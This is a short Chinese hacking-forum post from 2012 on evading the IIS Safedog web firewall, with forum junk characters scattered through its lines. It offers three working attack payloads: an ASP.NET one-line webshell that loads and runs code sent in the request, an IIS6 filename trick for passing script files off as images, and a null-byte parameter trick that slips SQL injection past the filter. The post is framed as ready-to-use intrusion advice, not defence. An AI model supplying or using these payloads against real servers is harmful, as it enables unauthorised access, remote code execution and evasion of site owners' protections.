1、绕过IIS安全狗的一句话。: j% h9 i8 J0 v3 N" l1 `
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。/ U8 N& o N1 m! ]6 N+ X9 c* z
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
5 n/ P& U/ _! n4 m9 Z- X$ f5 M3 n$ j
2、IIS6.0解析漏洞遇到安全狗。
; g) d- [; z! b5 { b文件名为& M8 A8 |) V7 K* i k$ B
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
* b. f6 f& i# S! s" u( w
/ j6 C3 @6 s! [% n: g这样的会被IIS安全狗果断屏蔽。, o- z# z, S0 l6 ^, p% C1 Q; F
改成如下名称,IIS6一样会解析:* h1 P' n' [1 o) z2 r* q* ?
www.xxxxx.com/;1.asp;1.jpg' }1 a6 u9 f) {- x% t
) _+ o3 F& n, _) V( Q! n+ I* F( v3、安全狗的注入绕过。
. }& Z% ~; t6 i& e常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
, H a) _% [* g# D9 L _ g9 Z; O/ V但如果:
( P. `2 C8 V1 W0 ~r00ts.asp?r00ts.com=%00.&id=69%20 and 1=14 m( \ v( \. h( A$ S, n
就可以成功绕过了。
' z/ e% a( s! H) V' w9 D% D4 |6 k7 p' o$ F
`: w8 Z; U. H |
发表于 2012-10-31 08:25:30
收藏
支持
反对